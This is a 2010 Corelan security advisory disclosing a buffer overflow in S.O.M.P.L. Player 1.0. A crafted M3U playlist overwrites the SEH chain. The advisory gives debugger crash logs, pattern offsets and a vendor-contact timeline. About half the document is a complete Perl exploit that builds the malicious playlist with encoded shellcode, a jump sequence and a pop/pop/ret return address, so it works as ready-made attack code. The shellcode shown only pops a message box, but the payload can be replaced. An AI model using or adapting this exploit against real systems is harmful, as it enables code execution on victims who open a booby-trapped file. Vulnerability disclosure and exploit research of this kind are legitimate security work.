S.O.M.P.L. Player 1.0 Buffer Overflow

`  
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-006  
Disclosure date : 20 January 2010  
http://www.corelan.be:8800/index.php/forum/security-advisories/  
  
  
0x00 : Vulnerability information  
--------------------------------  
  
[*] Product : S.O.M.P.L player  
[*] Version : 1.0  
[*] Vendor : George Fesalides  
[*] URL : http://sourceforge.net/projects/somplmp3/files/  
[*] URL2 : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html  
[*] Platform : Windows  
[*] Type of vulnerability : Buffer Overflow   
[*] Risk rating : Medium   
[*] Issue fixed in version : ???  
[*] Vulnerability discovered by : Rick2600   
[*] Greetings to : corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r  
  
  
0x01 : Vendor description of software  
-------------------------------------  
S.O.M.PL. Is a Simple Open Music Player that plays mp3 files. This player loads mp3 files and stores them in a playlist. It includes features such as random tracks selection,tracks repetition,loading playlist, saving playlist.  
  
  
  
0x02 : Vulnerability details  
----------------------------  
The discovered vulnerability allows an attacker to send a crafted malicious playlist (M3U) whereby  
the user could be tricked into executing unauthorized commands.  
In order for the vulnerability to be triggered, an end user must be tricked into loading a malicious  
playlist (M3U) on SOMPL.  
  
Crash information :  
  
(dc.e4): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=41414141 ebx=41414141 ecx=00000000 edx=00000000 esi=0012eb48 edi=00000000  
eip=40004ae4 esp=0012eb18 ebp=0012fb4c iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246  
VCL50!SystemLStrClr$qqrr17SystemAnsiString:  
40004ae4 8b10 mov edx,dword ptr [eax] ds:0023:41414141=????????  
Missing image name, possible paged-out or corrupt data.  
Missing image name, possible paged-out or corrupt data.  
Missing image name, possible paged-out or corrupt data.  
0:000> !exchain  
0012eb2c: VCL50!StdctrlsTRadioButtonCNCommand$qqrr19MessagesTWMCommand+e6 (40048762)  
0012fb7c: 41414141  
Invalid exception stack at 41414141  
  
  
!pvefindaddr findmsp :  
  
Log data  
0BADF00D -------------------------------------------------------------------------  
0BADF00D Searching for metasploit pattern references  
0BADF00D -------------------------------------------------------------------------  
0BADF00D [1] Checking register addresses and contents  
0BADF00D ============================================  
0BADF00D Register EDI points to Metasploit pattern at position 0  
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096  
0BADF00D Register EBP points to Metasploit pattern at position 4100  
0BADF00D Register EDX points to Metasploit pattern at position 0  
0BADF00D Register EBX is overwritten with Metasploit pattern at position 4096  
0BADF00D Register ESI points to Metasploit pattern at position 0  
0BADF00D [2] Checking seh chain  
0BADF00D ======================  
0BADF00D - Checking seh chain entry at 0x0012eb2c, value 40048762  
0BADF00D - Checking seh chain entry at 0x0012fb7c, value 46346946  
0BADF00D => record is overwritten with Metasploit pattern at position 4152  
0BADF00D -------------------------------------------------------------------------  
  
  
  
  
  
0x03 : Vendor communication  
---------------------------  
[*] 28 dec 2009 : Vendor contacted - no reply  
[*] 09 jan 2010 : Vendor contacted again - still no reply  
[*] 20 jan 2010 : Public disclosure  
  
  
0x04 : Exploit/PoC  
------------------  
  
# Exploit Title : SOMPL Player Buffer Overflow  
# Date : 20 January 2010  
# Author : Rick2600 (ricks2600[at]gmail{dot}com)  
# Bug found by : Rick2600 (ricks2600[at]gmail{dot}com)  
# Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html  
# Version : 1.0  
# Issue fixed in: ???  
# OS : Windows  
# Tested on : XP SP2 and SP3 En  
# Type of vuln : Buffer Overflow  
# Greetz to : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r  
#  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
#  
#  
# Code :  
  
print "|------------------------------------------------------------------|\n";  
print "| __ __ |\n";  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";  
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";  
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";  
print "| |\n";  
print "| http://www.corelan.be:8800 |\n";  
print "| |\n";  
print "|-------------------------------------------------[ EIP Hunters ]--|\n";  
print "[+] SOMPL Player Buffer Overflow - SEH Overwrite\n";  
  
  
$header = "#EXTM3U\n#EXTINF:";  
  
#Shellcode: x86/alpha_mixed( MsgBox )  
$shellcode =  
"\x89\xe7\xdb\xcf\xd9\x77\xf4\x59\x49\x49\x49\x49\x49\x49" .  
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .  
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .  
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .  
"\x75\x4a\x49\x48\x6b\x44\x62\x50\x56\x46\x51\x4b\x70\x42" .  
"\x44\x4c\x4b\x43\x70\x46\x50\x4b\x35\x4b\x70\x51\x68\x44" .  
"\x4c\x4e\x6b\x47\x30\x44\x4c\x4c\x4b\x50\x70\x47\x6c\x4c" .  
"\x6d\x4c\x4b\x43\x70\x46\x68\x4a\x4b\x46\x69\x4c\x4b\x43" .  
"\x70\x44\x74\x4e\x6d\x43\x70\x51\x6c\x4c\x4b\x47\x30\x45" .  
"\x6c\x43\x6e\x4f\x33\x48\x6b\x45\x39\x45\x30\x4c\x4b\x42" .  
"\x4c\x51\x34\x51\x34\x4e\x6b\x43\x75\x47\x4c\x4e\x6b\x51" .  
"\x44\x47\x75\x43\x48\x46\x61\x49\x7a\x4e\x6b\x50\x4a\x47" .  
"\x68\x4e\x6b\x42\x7a\x51\x30\x43\x31\x4a\x4b\x4a\x43\x50" .  
"\x34\x47\x39\x4c\x4b\x44\x74\x4c\x4b\x43\x31\x48\x6e\x50" .  
"\x31\x4b\x4f\x45\x61\x49\x50\x4b\x4c\x4c\x6c\x4d\x54\x49" .  
"\x50\x44\x34\x43\x37\x4a\x61\x48\x4f\x46\x6d\x46\x61\x48" .  
"\x47\x48\x6b\x4b\x44\x45\x6b\x43\x4c\x44\x64\x46\x48\x50" .  
"\x75\x4d\x31\x4c\x4b\x43\x6a\x51\x34\x47\x71\x48\x6b\x50" .  
"\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x46" .  
"\x61\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x68\x4d" .  
"\x59\x47\x34\x46\x44\x45\x4c\x50\x61\x4f\x33\x4e\x4d\x42" .  
"\x70\x46\x32\x48\x68\x4f\x5a\x4b\x4f\x4b\x4f\x49\x6f\x4e" .  
"\x69\x43\x37\x51\x54\x51\x54\x47\x34\x43\x74\x43\x74\x47" .  
"\x34\x43\x74\x42\x64\x47\x37\x47\x37\x50\x47\x42\x67\x50" .  
"\x39\x48\x4e\x51\x65\x4b\x56\x4a\x63\x42\x6c\x50\x4c\x42" .  
"\x6c\x42\x6c\x4d\x59\x4b\x55\x4b\x58\x45\x38\x4b\x4f\x49" .  
"\x6f\x49\x6f\x4c\x49\x4b\x72\x48\x6b\x45\x4c\x51\x4e\x4c" .  
"\x4d\x51\x6d\x45\x54\x4e\x69\x4c\x31\x4b\x30\x49\x51\x46" .  
"\x6c\x48\x68\x4f\x38\x49\x6f\x49\x6f\x4b\x4f\x48\x6b\x47" .  
"\x65\x45\x61\x49\x42\x51\x49\x4c\x48\x42\x71\x42\x34\x43" .  
"\x61\x42\x72\x4b\x4f\x50\x54\x44\x64\x44\x4c\x4a\x48\x4b" .  
"\x6f\x4b\x4f\x4b\x4f\x4b\x4f\x51\x47\x51\x6f\x51\x39\x42" .  
"\x42\x48\x68\x48\x66\x4b\x4f\x49\x6f\x49\x6f\x47\x33\x42" .  
"\x4f\x43\x42\x51\x75\x42\x4c\x50\x61\x42\x4e\x51\x30\x50" .  
"\x54\x51\x75\x43\x51\x50\x6d\x51\x30\x44\x6d\x47\x50\x42" .  
"\x70\x42\x77\x50\x4e\x50\x45\x42\x64\x42\x78\x41\x41";  
  
$filename = "somplPOC.m3u";  
print "[+] Check: $filename\n\n";  
  
$buffer = "\x90" x 5;  
$buffer .= $shellcode;  
$buffer .= "B" x (4138 - length($shellcode));  
$buffer .= "\xE9\xCD\xEF\xFF\xFF";  
$buffer .= "\xEB\xF9\x90\x90";  
$buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll  
  
  
  
open (FILE, ">$filename");  
print FILE $buffer;  
close(FILE);  
  
  
  
  
`